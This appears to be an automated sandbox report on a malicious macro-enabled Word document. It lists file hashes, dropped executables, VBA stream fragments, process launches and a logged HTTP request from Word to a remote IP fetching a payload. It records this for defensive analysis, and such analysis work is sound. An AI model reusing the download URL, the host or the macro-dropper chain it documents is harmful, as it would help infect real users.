                                                                                                                                                  SHA-512:02E47727BE33B93C4CA538A0E089720C0AC6D7CDC758216ECE0AD3380A75C151D9E2C6BA66A564209E3AC750720CBD3E415FA202ADE20852785D507C488076C3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  IE Cache URL:http://45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
                                                                                                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "rm" was not found on this server.</p>.</body></html>.
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):61952
                                                                                                                                                  Entropy (8bit):6.1891584557780455
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:vV+4s9C36jbgktDymekZ+bRnbSEln5IyYpamDjobj8S47:vc8ms1mibRJln5IUmDjoX07
                                                                                                                                                  MD5:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                  SHA1:BCC5DC3222034D3F257F1FD35889E5BE90F09B5F
                                                                                                                                                  SHA-256:4E15AA13A02798E924C63537E458A09415C48DAE0E7AFD5A3D25532A2AA935EE
                                                                                                                                                  SHA-512:85C94763698448275AD996805FD59A3A4789BEFB79BE2175E2BBFED1CE9A2D424500DCAF42FFA225C33FE7090F0FEDF6B7BED63168FEC64D112CD09559829AFE
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...o...l...h..l..m.o.l...m..l...i..l...e...l....l...n..l.Rich.l.................PE..L...4^?..................b..........Pa............@..........................@............@.............................................hg...................0..D.......T........................... .......................lm..`....................text....a.......b.................. ..`.data................f..............@....idata...............h..............@..@.didat..............................@....rsrc...hg.......h..................@..@.reloc..D....0......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):201
                                                                                                                                                  Entropy (8bit):5.110875983732391
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:6:pn0+Dy9xwGObRmEr6VnetdzRx3bIGKCezocKqD:J0+oxBeRmR9etdzRxbIYez1T
                                                                                                                                                  MD5:6DFF44B8B60DD046290A5420717F052E
                                                                                                                                                  SHA1:2339B6BC052682B5CC618733AEEE776037485D3E
                                                                                                                                                  SHA-256:2E519B2E823E2503B635A59BBC29A00170F18F86BC7F5330563188B105FF87D7
                                                                                                                                                  SHA-512:02E47727BE33B93C4CA538A0E089720C0AC6D7CDC758216ECE0AD3380A75C151D9E2C6BA66A564209E3AC750720CBD3E415FA202ADE20852785D507C488076C3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>404 Not Found</title>.</head><body>.<h1>Not Found</h1>.<p>The requested URL "rm" was not found on this server.</p>.</body></html>.
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                  Category:modified
                                                                                                                                                  Size (bytes):50176
                                                                                                                                                  Entropy (8bit):4.446577513207149
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:iOxHjpXzfL/Op0tzHgq6HcOMyb3pQ9Wm:PHNXzfLGp0tjuq
                                                                                                                                                  MD5:0F4002523504A72D1C1ECCA6461FD0FE
                                                                                                                                                  SHA1:4F57980D01264F72837838B668AA512E28227684
                                                                                                                                                  SHA-256:E9584CB638EEC3A1A65E7B9BF9DA817619F897806667B6E9768A25767BD37A4B
                                                                                                                                                  SHA-512:D345BA9E497AFB98F865FCF7616AA0648C419463E1F36E3DA43F79F4B72C1F756D2178043B05F18ED4AC49FFB6609B394A43916A519416F5FF93E392A5D9023B
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:......................>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................F...........&........................................................................................................... ...!..."...#...$...%.......'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7.......9...:...;...<...=.......?...@...A...B...C...D...E...8...]...H...I...J...M...L.......N...O...P...Y...R...S...T...U...V...W...X...K...Z...[...\...^......._...`...........................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:45 2022, mtime=Fri Aug 12 00:08:24 2022, atime=Fri Aug 12 00:08:17 2022, length=2203070, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1160
                                                                                                                                                  Entropy (8bit):4.662753215532605
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:8K8vWUJ+uElPCH2H4Ah0Y6av+W64INsLt4LGKAjAN/+KX9LN4xLG8DQttRI5E4tn:8K1pu38PANGM9xGDGtia7aB6m
                                                                                                                                                  MD5:F058DD614E7BAD188022144BA4DA6D4B
                                                                                                                                                  SHA1:57455EDB238AEEDB74260805ED26141BD7A2349D
                                                                                                                                                  SHA-256:E66BADE84CFDB5540C509B4DC79AF1F6715E4860CE0BEB8A58AC3E44A9F8DB5B
                                                                                                                                                  SHA-512:C0B696144F870441E27A81B243EADC6B67B5B3AB5CAF9FCAF4F95A333FBCA8EC40A288BCD7F9DE10094743B1DF29D15764539D7624A53FC7CB1DD0759B6B84D1
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:L..................F.... ....9..3...l..............!..........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...U......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..U.......S........................h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..U.......Y..............>......+..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2...!..U.. .AIREQU~1.DOC..x......hT...U......h.....................S./.a.i.r.e.q.u.i.p.m.e.n.t.c.o.r.p.-.d.o.c.-.0.8...1.1...2.0.2.2...d.o.c.......i...............-.......h...........>.S......C:\Users\user\Desktop\airequipmentcorp-doc-08.11.2022.doc..:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.a.i.r.e.q.u.i.p.m.e.n.t.c.o.r.p.-.d.o.c.-.0.8...1.1...2.0.2.2...d.o.c.........:..,.LB.)...As...`.......X.......506013...........!a..%.H.VZAj.../............-..!a..%.H.VZAj.../............-.............1SPS.XF.L8C....&.m.q............/...S.-.1
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):121
                                                                                                                                                  Entropy (8bit):4.7517053629131425
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:bDuMJlcMQJM3aBYUULX9TLBCmX1QM3aBYUULX9TLBCv:bC3J+LX9HB6+LX9HBs
                                                                                                                                                  MD5:B530AD95DAC76D5DA42BA8619EB35F40
                                                                                                                                                  SHA1:CE9DD98B6B91A9677E5C56BE72AF625F120D59C6
                                                                                                                                                  SHA-256:DB19F88917C4006CC2BE0FFACBC095FBF53982280797423D930869F4194EF767
                                                                                                                                                  SHA-512:0515B44EC6A9CC5D8B1686632958CD1B337F7C4C9516B0D613454CEFE75586374F411F53EF74062272DC04744589A4907FF3076BC6DC13B710872A8C0EEC93B1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:[folders]..Templates.LNK=0..airequipmentcorp-doc-08.11.2022.doc.LNK=0..[doc]..airequipmentcorp-doc-08.11.2022.doc.LNK=0..
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):162
                                                                                                                                                  Entropy (8bit):2.693120269145364
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Rl/ZdYx7lqKHxee1lzlqKD6lppJ+xl/:RtZWccYe1lkYGpJOt
                                                                                                                                                  MD5:D8F53F403FF9B5DC094F8EB0B3AC9ABD
                                                                                                                                                  SHA1:CB179015D23B12583305CFACDD70A28756E621DE
                                                                                                                                                  SHA-256:4BE62515AFE61F2D4C7D5240E9B64C55DF38CA8B9AEC0848AC18D2D3B31DD362
                                                                                                                                                  SHA-512:5802A1322DB5769C14C654F95B2007133E7D5C58EE4FE1B8501681514A91A72F4A7875D4D4F77294EE6925345E56DE35F7A51552120459ABABEA3B9F452A1ED6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.pratesh................................................p.r.a.t.e.s.h...l.l.....?O............H.......6C........;O............T.......6C........7O......Ul.`@.....
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2
                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):162
                                                                                                                                                  Entropy (8bit):2.693120269145364
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:Rl/ZdYx7lqKHxee1lzlqKD6lppJ+xl/:RtZWccYe1lkYGpJOt
                                                                                                                                                  MD5:D8F53F403FF9B5DC094F8EB0B3AC9ABD
                                                                                                                                                  SHA1:CB179015D23B12583305CFACDD70A28756E621DE
                                                                                                                                                  SHA-256:4BE62515AFE61F2D4C7D5240E9B64C55DF38CA8B9AEC0848AC18D2D3B31DD362
                                                                                                                                                  SHA-512:5802A1322DB5769C14C654F95B2007133E7D5C58EE4FE1B8501681514A91A72F4A7875D4D4F77294EE6925345E56DE35F7A51552120459ABABEA3B9F452A1ED6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.pratesh................................................p.r.a.t.e.s.h...l.l.....?O............H.......6C........;O............T.......6C........7O......Ul.`@.....
                                                                                                                                                  File type:Zip archive data, at least v2.0 to extract
                                                                                                                                                  Entropy (8bit):7.993807361796733
                                                                                                                                                  TrID:
                                                                                                                                                  • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                  • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                  • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                  File name:airequipmentcorp-doc-08.11.2022.doc
                                                                                                                                                  File size:2297841
                                                                                                                                                  MD5:84904f679048e45c43210c22f8fcc5df
                                                                                                                                                  SHA1:7e23ee02e2543e51a2ad97b2ede96c441d34e6eb
                                                                                                                                                  SHA256:78c296d80214d887820a3c55bc06fbc42b17db90fb01aef0766365b383f1e7f1
                                                                                                                                                  SHA512:c7f757c4b357b72f8edc9988ef99dd73b2d0fb9c48f928a3d806c57fbc168b8d2d141a625a5ce76a4c7a6533708984d200031bc56d44b6d756e512cfd823b3d7
                                                                                                                                                  SSDEEP:49152:tqI9FlNmHCQkEV8Uxd938Vx8Z3rm06VNN9hTobO3b1:4I9F3miQkimVi3rD6VP4aB
                                                                                                                                                  TLSH:F8B53302D0155771C5F1C8F98C5AA1B842B8D2321521EE5F4B3CB81ACBBDDCA7B85ADE
                                                                                                                                                  File Content Preview:PK..........!..U~............._rels/.rels...J.@............4.E..D.....$....T..w-..j........|.zs..z..z.*X.%(v......6O.{PI........`S__._x .C..CR....:....t..R......hI.3..H.Q..*.;..=..y... n.......yo.......[vrf..A..6..3[.>_...-K....\NH!....<..r...E.B..P...<_.
                                                                                                                                                  Icon Hash:74f4c4c6c1cac4d8
                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1
                                                                                                                                                  Has Summary Info:
                                                                                                                                                  Application Name:
                                                                                                                                                  Encrypted Document:False
                                                                                                                                                  Contains Word Document Stream:True
                                                                                                                                                  Contains Workbook/Book Stream:False
                                                                                                                                                  Contains PowerPoint Document Stream:False
                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                  Contains ObjectPool Stream:False
                                                                                                                                                  Flash Objects Count:0
                                                                                                                                                  Contains VBA Macros:True
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/ThisDocument
                                                                                                                                                  VBA File Name:ThisDocument.cls
                                                                                                                                                  Stream Size:2740
                                                                                                                                                  Data ASCII:. . A t t r i b u t . e V B _ N a m . e = " T h i . s D o c u m e n . t " . . . B a s . . 1 N o r m a l . . . V G l o b a l ! . S p a c . l F a . l s e . J C r e a . t a b l . . P r e d e c l a . . I d . . # T r u . " E x p . o s e . . T e m p . l a t e D e r i . v . $ C u s t o m l i z C . P . . . . . D . ? P t r S a . f e F u n c t i o n . . . L i b " u s e . r 3 2 " A l i . a s " S e t T . i m e r " ( B . y V a l . . . . . . . A s L o n g , , { . . . . . . , . . ) .
                                                                                                                                                  Data Raw:01 bc b4 00 41 74 74 72 69 62 75 74 00 65 20 56 42 5f 4e 61 6d 00 65 20 3d 20 22 54 68 69 00 73 44 6f 63 75 6d 65 6e 10 74 22 0d 0a 0a 8c 42 61 73 01 02 8c 31 4e 6f 72 6d 61 6c 02 2e 19 56 47 6c 6f 62 61 6c 21 01 aa 53 70 61 63 01 6c 46 61 08 6c 73 65 0c 4a 43 72 65 61 10 74 61 62 6c 15 1f 50 72 65 20 64 65 63 6c 61 00 06 49 64 11 00 23 54 72 75 0d 22 45 78 70 08 6f 73 65 14 1c 54

                                                                                                                                                  General
                                                                                                                                                  Stream Path:PROJECT
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Stream Size:369
                                                                                                                                                  Entropy:5.245272756909884
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:I D = " { E F 2 1 A C D 1 - 0 7 C 6 - 4 1 0 B - 8 1 6 A - F 3 5 B E 5 6 2 A 9 A 6 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " F 5 F 7 1 8 1 1 F 8 0 2 F C 0 2 F C 0 2 F C 0 2 F C " . . D P B = " E A E 8 0 7 2 0 F D 2 1 F D 2 1 F D " . . G C = " D F D D 3 2 3 F D 2 C 1 C 6 C 2 C 6 C 2 3 9 " . . . . [ H o s t E x t e n d e r I n f
                                                                                                                                                  Data Raw:49 44 3d 22 7b 45 46 32 31 41 43 44 31 2d 30 37 43 36 2d 34 31 30 42 2d 38 31 36 41 2d 46 33 35 42 45 35 36 32 41 39 41 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                                                                                                                                                  General
                                                                                                                                                  Stream Path:PROJECTwm
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:41
                                                                                                                                                  Entropy:3.0773844850752607
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                                                                                                                                                  Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                  File Type:ISO-8859 text, with no line terminators
                                                                                                                                                  Stream Size:7
                                                                                                                                                  Entropy:1.8423709931771088
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:a . . .
                                                                                                                                                  Data Raw:cc 61 ff ff 00 00 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/__SRP_2
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:5116
                                                                                                                                                  Entropy:1.9229388656001654
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . " . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` ) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:72 55 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 22 00 1f 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/__SRP_3
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:2724
                                                                                                                                                  Entropy:2.6943726453670886
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . ` . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . Q . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . ` . q . . . . . . . . . . . , . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . Q . P . 1 . . . . . . . . . . . \\ .
                                                                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 60 00 a1 08 00 00 00 00 00 00 00 00 00 00 00 00 04 70 10 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/dir
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:486
                                                                                                                                                  Entropy:6.306571446096894
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. . . . . . . . . . 0 . . . . . . H . . . . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . R d - . . . " . < . . . . r s t d o . l e > . . s . t . . d . o . l . e . ( . . h . . ^ . . * \\ . G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . 4 6 } # 2 . 0 # . 0 # C : \\ W i n . d o w s \\ s y s @ t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t . i o n . E N o r ( m a l E N C r . m . a F . . c E C . . . . . m . ! O f f i c g O . f . i . c g . . g 2 D F 8 D 0 . 4 C - 5 B F A -
                                                                                                                                                  Data Raw:01 e2 b1 80 01 00 04 00 00 00 03 00 30 aa 02 02 90 09 00 20 14 06 48 03 00 a8 80 00 00 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 00 08 06 12 09 02 12 80 dc 52 f4 64 2d 00 0c 02 22 0a 3c 02 0a 16 02 72 73 74 64 6f 08 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 00 28 0d 00 68 00 11 5e 00 03 2a 5c 00 47 7b 30 30 30
                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Aug 11, 2022 18:08:29.353974104 CEST4973880192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 18:08:29.457240105 CEST804973845.8.146.139192.168.2.3
                                                                                                                                                  Aug 11, 2022 18:08:29.457406044 CEST4973880192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 18:08:29.457667112 CEST4973880192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 18:08:29.561008930 CEST804973845.8.146.139192.168.2.3
                                                                                                                                                  Aug 11, 2022 18:08:29.575757980 CEST804973845.8.146.139192.168.2.3
                                                                                                                                                  Aug 11, 2022 18:08:29.575900078 CEST4973880192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 18:08:34.581047058 CEST804973845.8.146.139192.168.2.3
                                                                                                                                                  Aug 11, 2022 18:08:34.581135988 CEST4973880192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 18:10:11.599394083 CEST4973880192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 18:10:12.004218102 CEST4973880192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 18:10:12.707479000 CEST4973880192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 18:10:14.004400015 CEST4973880192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 18:10:16.410872936 CEST4973880192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 18:10:21.223809004 CEST4973880192.168.2.345.8.146.139
                                                                                                                                                  Aug 11, 2022 18:10:30.834017038 CEST4973880192.168.2.345.8.146.139
                                                                                                                                                  • 45.8.146.139
                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.34973845.8.146.13980C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Aug 11, 2022 18:08:29.457667112 CEST1163OUTGET /fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: 45.8.146.139
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Aug 11, 2022 18:08:29.575757980 CEST1163INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 11 Aug 2022 16:08:29 GMT
                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                                                                                  X-Powered-By: PHP/7.2.34
                                                                                                                                                  Content-Length: 201
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 72 6d 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "rm" was not found on this server.</p></body></html>


                                                                                                                                                  Click to jump to process

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:18:08:18
                                                                                                                                                  Start date:11/08/2022
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                  Imagebase:0xcd0000
                                                                                                                                                  File size:1937688 bytes
                                                                                                                                                  MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Target ID:2
                                                                                                                                                  Start time:18:08:29
                                                                                                                                                  Start date:11/08/2022
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\rECA2.tmp.exe" "C:\Users\user\AppData\Local\Temp\yE9E2.tmp.dll",#1
                                                                                                                                                  Imagebase:0x1000000
                                                                                                                                                  File size:61952 bytes
                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 0%, Metadefender, Browse
                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                  Reputation:high

                                                                                                                                                  Target ID:25
                                                                                                                                                  Start time:18:10:02
                                                                                                                                                  Start date:11/08/2022
                                                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                  Imagebase:0x7ff674600000
                                                                                                                                                  File size:488448 bytes
                                                                                                                                                  MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  No disassembly